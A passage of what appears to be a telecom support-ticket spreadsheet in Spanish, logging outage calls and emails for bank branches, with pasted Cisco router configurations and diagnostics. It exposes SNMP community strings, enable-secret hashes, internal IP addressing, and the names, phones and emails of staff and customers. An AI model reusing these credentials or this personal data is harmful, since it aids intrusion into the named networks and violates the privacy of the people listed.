 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE FASTETHERNET0/0/1
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/2
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/3
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.137.18.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.167.18.126 255.255.255.0
!
INTERFACE BVI1
 NO IP ADDRESS
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 SHUTDOWN
!
ROUTER OSPF 1
 ROUTER-ID 10.72.112.63
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.112.0 0.0.0.127 AREA 164
 NEIGHBOR 10.72.112.1
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.112.129 225 NAME REDUNDANCIA
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.167.18.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.124.201/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.137.18.16/29
LOGGING SOURCE-INTERFACE LOOPBACK5
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION AGENCIA 718 MERCADO SAN FRANCISCO EL ALTO 1 CALLE 0-80 ZONA 2 TOTONICAPAN SAN FRANCISCO EL ALTO
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
CONTROL-PLANE
!
BRIDGE 1 PROTOCOL IEEE
BRIDGE 1 ROUTE IP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718#SHO VER
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.3(2)T, RELEASE SOFTWARE (FC3)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2013 BY CISCO SYSTEMS, INC.
COMPILED THU 28-MAR-13 14:47 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_BANRURAL_GT_AGENCIA_0718 UPTIME IS 14 WEEKS, 4 DAYS, 22 HOURS, 13 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH0:C1900-UNIVERSALK9-MZ.SPA.153-2.T.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73785F4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73785F4
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0718#</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE VISITA SE PROGRAMA PARA EL DIA LUNES 23 A LAS 8:00 AM
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 21 DE MAYO DE 2022 11:55
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; AGE718 - SAN FRANCISCO DE ASIS &lt;AGE718@BANRURAL.COM.GT&gt;; AGE718.SUBGERENTE - SAN FRANCISCO DE ASIS &lt;AGE718.SUBGERENTE@MAILPRIVADO.BDR&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SIN SERVICIO|| 8902072T || BANCO DE DESARROLLO RURAL, S.A. || AGENCIA 718 MERCADO SAN FRANCISCO EL ALTO 1 CALLE 0-80 ZONA 2 TOTONICAPAN SAN FRANCISCO EL ALTO
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, LE COMENTAMOS QUE PERSONAL TÉCNICO SE ENCUENTRA A 1 HORA CON 45 MINUTOS DEL LUGAR, POR LO QUE SE PROGRAMA VISITA PARA EL DÍA LUNES 23/05/22 A LAS 8:00 AM.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IRIS BATZ 46266783 UBICA LOS EQUIPOS ENCONTRO UN EQUIPO ETX-1, VALIDA QUE ESTA ENCENDIDO APLICO REINICIO PERO EL ENLACE NO LEVANTA. SE PROCEDE A SOLICITAR APOYO PARA VISITA TECNICA.
PWR: ROJO
NET 1: APAGADO
USER 3: VERDE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA.  IRIS BATZ  4213-7505 NO CONTESTO IVR ENVIA A BUZON, ID: 1001342318.</t>
  </si>
  <si>
    <t>F4571771</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DEL RFO, LA SOLICITUD SE HIZO EL VÍA VIERNES 20, EN ESPERA DE LAS 48/72 HORAS HÁBILES, SE ESPERA TENERLO EN EL TRANSCURSO DE ESTA SEMANA.</t>
  </si>
  <si>
    <t>F4571779</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN MONITOREO PROACTIVO, CAIDA TOTAL
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM_14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1779
ID: 806300287T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM_1433
UBICADO EN: (ATM 1433) IGSS ZONA 6 BANCO BANRURAL - 19 AVENIDA 7-14 ZONA 6
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4571782</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO PERMISOS DE ACCESO.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: MARTES, 24 DE MAYO DE 2022 15:48PARA: FELIPE.FLORES@CREDICAMPO.COM.SV &lt;FELIPE.FLORES@CREDICAMPO.COM.SV&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ZZ_CC_AAA &lt;ZZ_CC_AAA@CLARO.COM.SV&gt;ASUNTO: ID1053045 || SOC COOP DE AHORRO Y CREDITO CREDICAMPO DE RL DE CV || COJUTEPEQUE BO. SAN JUAN
BUENAS TARDES ESTIMADO CLIENTE,
COMO PARTE DEL SEGUIMIENTO AL ENLACE DE SOC COOP DE AHORRO Y CREDITO CREDICAMPO DE RL DE CV ID ID1053045 CON UBICACIÓN EN COJUTEPEQUE BO. SAN JUAN CALLE LOS COPANASTES 6 8 AV.SUR, SE SOLICITA PUEDA BRINDARSE PERMISOS DE ACCESO A PERSONAL TÉCNICO QUE PODRÍA SER ASIGNADO A LA ATENCIÓN DE LA MISMA, LA VISITA HA SIDO SOLICITADA PARA EL DÍA DE MAÑANA 25 DE MAYO A LAS 08:00 HORAS. POR LO QUE SOLICITAMOS PUEDA CONFIRMARNOS POR ESTE MEDIO PARA PROCEDER A ENVIAR AL PERSONAL TÉCNICO A REALIZAR LA CERTIFICACIÓN DEL ANCHO DE BANDA.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SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO FELIPE AL  79196262 - 78851450 INDICA QUE REALIZARA PRUEBAS Y SOLICITA QUE SE LE LLAME EN 30 MINUTOS **
ID 1001603234 - 1001603498
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO FELIPE AL 79196262 - 78851450 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
ID 1001556792 - 1001556918
**</t>
  </si>
  <si>
    <t>F4571809</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONVERSA CON CLIENTE BLADIMIR SANTOS, INDICA QUE SE LE QUEMO EL ROUTER INTERNO, POR LO QUE FUE A COMPRAR UNO NUEVO Y LO VA A CONFIGURAR, INDICA QUE SE LE LLAME DENTRO DE 1 HORA (17:25 HORAS) PARA VALIDAR ESTADO DEL SERVICIO YA QUE SI ES NECESARIO MENCIONA QUE SOLICITARA INFORMACION DE DIRECCIONAMIENTO.
1001261648
COLA:
NOMBRE: A: 58266179
NÚMERO: 58266179
DURACIÓN: 0:02:04
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 58266179
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 20/05/2022 16:24:11</t>
  </si>
  <si>
    <t>F4571811</t>
  </si>
  <si>
    <t xml:space="preserve">SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE .
ROUTER CPE ACTIVO HACE 2 SEMANAS.
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2013 BY CISCO SYSTEMS, INC.
COMPILED TUE 26-FEB-13 02:11 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_BAM_GT_AGENCIA_195 UPTIME IS 2 WEEKS, 45 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH0:C1900-UNIVERSALK9-MZ.SPA.152-4.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72781LY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72781LY
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BAM_GT_AGENCIA_195#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4107 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BAM_GT_AGENCIA_195
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX172781LY
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.114.34 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/7300200T/_/
 BANDWIDTH 5120
 NO IP ADDRESS
 NO IP PROXY-ARP
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
 ARP TIMEOUT 300
!
INTERFACE GIGABITETHERNET0/0.366
 DESCRIPTION WAN PRINCIPAL/_/7300200T/_/
 BANDWIDTH 5120
 ENCAPSULATION DOT1Q 366
 IP ADDRESS 10.87.80.6 255.255.255.224
 NO IP PROXY-ARP
 RATE-LIMIT INPUT 5120000 640000 1280000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 640000 1280000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF MTU-IGNORE
 ARP TIMEOUT 300
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN REDUNDANTE/_/7300244T/_/
 BANDWIDTH 1024
 IP ADDRESS 10.87.80.38 255.255.255.224
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 IP OSPF COST 125
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE FASTETHERNET0/0/0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE FASTETHERNET0/0/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE FASTETHERNET0/0/2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE FASTETHERNET0/0/3
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.46.101.173 255.255.255.252
 NO AUTOSTATE
!
ROUTER OSPF 1
 ROUTER-ID 10.87.80.6
 AREA 212 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.87.80.6 0.0.0.0 AREA 212
 NEIGHBOR 10.87.80.1
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.87.80.33 200 NAME REDUNDANCIA_WIMAX
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.46.101.172/30
IP PREFIX-LIST CONNECTED SEQ 20 PERMIT 10.212.114.34/32
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
!
SNMP-SERVER COMMUNITY MON000073D RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION FRENTE AL MERCADO MUNICIPAL PANZOS, ALDEA TELEMAN, ALTA VERAPAZ
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
!
CONTROL-PLANE
!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M_GT_AGENCIA_195#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 47 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 47 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 50 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.627: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*MAY  7 02:46:45.619: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY  7 02:46:56.623: %ESWMRVL_FLTMG-5-NOTICE: NOTICE: FPGA REV 0X71
*MAY  7 02:47:02.451: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO RESET
*MAY  7 02:47:02.451: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO RESET
*MAY  7 02:47:03.439: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY  7 02:47:03.451: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY  7 02:47:03.451: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY  7 02:47:04.699: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY  7 02:47:04.703: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY  7 02:47:04.955 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY  7 02:47:05.855 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY  7 02:47:05.919 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY  7 02:47:06.779 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY  7 02:47:06.851 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY  7 02:47:07.143 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO UP
*MAY  7 02:47:08.027 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY  7 02:47:08.027 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY  7 02:47:08.031 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2013 BY CISCO SYSTEMS, INC.
COMPILED TUE 26-FEB-13 02:11 BY PROD_REL_TEAM
*MAY  7 02:47:08.071 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BAM_GT_AGENCIA_195 IS UNDERGOING A COLD START
*MAY  7 02:47:08.691 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY  7 02:47:08.695 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/1, CHANGED STATE TO DOWN
*MAY  7 02:47:08.695 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/2, CHANGED STATE TO DOWN
*MAY  7 02:47:08.695 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO UP
*MAY  7 02:47:11.535 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY  7 02:47:12.535 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY  7 02:47:37.327 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.87.80.1 ON GIGABITETHERNET0/0.366 FROM LOADING TO FULL, LOADING DONE
*MAY 11 14:17:09.041 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO DOWN
*MAY 11 14:17:10.045 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO DOWN
*MAY 11 14:17:20.513 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO UP
*MAY 11 14:17:21.513 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0/0/3, CHANGED STATE TO UP
*MAY 15 14:02:10.485 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 15 14:02:11.485 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 15 14:02:16.485 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 15 14:02:17.485 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 15 14:07:17.485 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 15 14:07:18.485 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 15 14:07:23.485 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 15 14:07:24.485 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 15 14:12:24.485 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 15 14:12:25.485 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 15 14:12:29.485 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 15 14:12:30.485 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 15 21:23:54.987 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.87.80.1 ON GIGABITETHERNET0/0.366 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 16 02:03:36.522 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.87.80.1 ON GIGABITETHERNET0/0.366 FROM LOADING TO FULL, LOADING DONE
*MAY 20 15:56:52.403 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.87.80.1 ON GIGABITETHERNET0/0.366 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 21 01:05:08.405 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.87.80.1 ON GIGABITETHERNET0/0.366 FROM LOADING TO FULL, LOADING DONE
CC_BAM_GT_AGENCIA_195#
SHOW CLOCK
*03:31:42.840 UTC SAT MAY 21 2022
CC_BAM_GT_AGENCIA_195#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.46.101.173           -   6C41.6AA0.0763  ARPA   VLAN1
INTERNET  10.46.101.174           0   F08E.DB14.0E5F  ARPA   VLAN1
INTERNET  10.87.80.1              0   C4B8.B4DE.16B8  ARPA   GIGABITETHERNET0/0.366
INTERNET  10.87.80.6              -   6C41.6AA0.0760  ARPA   GIGABITETHERNET0/0.366
INTERNET  10.87.80.38             -   6C41.6AA0.0761  ARPA   GIGABITETHERNET0/1
CC_BAM_GT_AGENCIA_195#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/7300200T/_/
GI0/0.366                      UP             UP       WAN PRINCIPAL/_/7300200T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/7300244T/_/
FA0/0/0                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/1                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/2                        DOWN           DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/3                        UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BAM_GT_AGENCIA_195#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.366     10.87.80.6      YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.87.80.38     YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  UP                    UP
LOOPBACK5                  10.212.114.34   YES NVRAM  UP                    UP
VLAN1                      10.46.101.173   YES NVRAM  UP                    UP
CC_BAM_GT_AGENCIA_195#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN AGRICOLAMERCANTIL 10.87.80.6
  PING 10.87.80.6: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.80.6 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/4/5 MS
RUTA IP:
PE: 10.179.28.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE AGRICOLAMERCANTIL 10.87.80.6
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : AGRICOLAMERCANTIL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
     10.87.80.6/32  DIRECT  0    0                 0.0.0.0         VLANIF366	</t>
  </si>
  <si>
    <t>F4571814</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MILTON QUIEN INDICA QUE TIENE DAÑO EN UNA EXTENSION LA CUAL ES 0728.
QUE SE LE QUEMO EL TELEFONO, SE LE INDICO QUE CLARO NO DA SEGUIMIENTO A LOS TELEFONOS DEL PBX.
SE PROCEDE CON EL CIERRE.
1001258246
COLA:
NOMBRE: A: 47706256
NÚMERO: 47706256
DURACIÓN: 0:00:14
ESTADO: MARCANDO
DETALLES: 47706256
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/05/2022 16:12:17</t>
  </si>
  <si>
    <t>F4571819</t>
  </si>
  <si>
    <t>SE RESPONDE A CLIENTE CON LA INFORMACIÓN SOLICITADA:
DE: OMAR ALBERTO OCHOA HID [OALBERTO.OCHOA@CLARO.COM.GT]
ENVIADO: VIERNES, 20 DE MAYO DE 2022 6:51 DE LA TARDEA: ERNESTO RUBIO;ODALIS ANAHI CARDENAS SALAZAR;CARLOS AGUILARGCC: CNOCCA;GRUPO N1;CORPORATIVOS, CLIENTESASUNTO: RE: SOLICITUD DE PERMISOS || BANCO DAVIVIENDA SALVADORENO S.A. || IP2037200SV || SD1127715
